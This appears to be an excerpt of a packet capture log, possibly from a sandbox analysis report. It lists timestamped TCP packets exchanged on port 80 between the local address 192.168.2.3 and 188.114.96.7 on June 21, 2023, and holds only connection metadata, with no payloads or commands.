Jun 21, 2023 04:27:44.857285023 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.857300997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.857676029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.857726097 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.857763052 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.857764006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.857786894 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.857911110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.857958078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.858002901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.858023882 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.858048916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.858073950 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.858093023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.858160019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.858217001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.858218908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.858264923 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.858323097 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.858869076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.858922005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.858958006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.858968973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.859019041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.859050035 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.859065056 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.859113932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.859114885 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.859160900 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.859210968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.859222889 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.859894991 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.859945059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.859994888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.859994888 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.860035896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860074043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860100031 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.860121965 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.860126972 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860167027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860204935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860279083 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.860735893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860778093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860833883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860867977 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.860886097 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.860887051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860928059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860965967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.860991955 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.861011982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.861048937 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.861112118 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.861656904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.861711025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.861737967 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.861757040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.861813068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.861819029 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.861855030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.861891985 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.861922979 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.861938953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.861977100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.862003088 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.862554073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.862597942 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.862636089 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.862675905 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.862684965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.862723112 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.862735033 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.862776041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.862793922 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.862821102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.862871885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.862905979 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.863493919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.863533020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.863583088 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.863585949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.863625050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.863653898 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.863671064 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.863708973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.863735914 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.863761902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.863898039 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.864408016 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.864464045 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.864484072 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.864510059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.864548922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.864573956 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.864593029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.864634037 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.864650011 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.864676952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.864716053 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.864728928 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.865365028 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.865406036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.865442991 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.865477085 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.865493059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.865524054 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.865542889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.865580082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.865621090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.865638971 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.865665913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.865737915 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.866264105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.866303921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.866341114 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.866355896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.866395950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.866435051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.866460085 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.866480112 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.866497040 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.866524935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.866564035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.866599083 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.867198944 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867244959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867285013 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.867405891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867464066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867507935 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.867521048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867561102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867587090 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.867607117 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867645979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867681026 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.867691994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867733002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.867793083 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.868408918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.868458033 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.868495941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.868530035 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.868549109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.868551016 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.868588924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.868626118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.868665934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.868701935 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.868710995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.868772984 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.869281054 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.869333982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.869366884 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.869385004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.869421005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.869462013 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.869477034 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.869508982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.869551897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.869560003 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.869600058 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.869611979 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.870238066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.870290995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.870332003 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.870342016 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.870383024 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.870429993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.870440006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.870474100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.870516062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.870533943 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.870563984 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.870568991 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.871153116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.871198893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.871238947 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.871248007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.871289015 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.871330023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.871345997 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.871377945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.871412039 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.871428013 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.871467113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.871527910 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.872071981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.872134924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.872170925 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.872189045 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.872229099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.872247934 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.872294903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.872335911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.872376919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.872400999 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.872421980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.872447968 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.872997999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.873044968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.873081923 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.873122931 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.873136997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.873143911 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.873181105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.873222113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.873235941 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.873265982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.873317957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.873333931 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.874084949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874124050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874155998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874190092 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874191046 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.874209881 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.874222040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874248981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874268055 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.874279976 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874306917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874358892 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.874876976 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874912024 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874938965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874969959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.874982119 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.875000000 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.875009060 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.875030994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.875046968 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.875061989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.875087976 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.875109911 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.875720024 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.875749111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.875798941 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.875998020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.876035929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.876064062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.876091003 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.876096964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.876120090 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.876127958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.876154900 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.876179934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.876205921 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.876211882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.876239061 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.876965046 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.877001047 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.877027035 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.877033949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.877063990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.877090931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.877125978 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.877178907 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.898833036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.898906946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.898977041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899046898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899094105 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.899116039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899183035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899187088 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.899234056 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899281025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899338007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899339914 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.899425983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899461031 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.899485111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.899487972 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899538040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899586916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899616957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.899640083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899684906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899739981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899755001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.899785042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899835110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899842024 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.899884939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899935961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.899947882 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.899991989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900011063 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.900043964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900099039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900105000 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.900149107 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900202036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900213957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.900254011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900336027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900381088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900417089 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.900439024 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.900443077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900490046 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900538921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900553942 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.900593996 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900643110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900666952 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.900697947 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900729895 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900758028 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.900798082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900863886 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900911093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.900942087 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.900965929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901019096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901032925 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.901077986 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901078939 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.901129007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901187897 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.901210070 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901253939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901299953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901319027 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.901355028 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901398897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901483059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901516914 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.901541948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901592970 CEST	80	49709	188.114.96.7	192.168.2.3
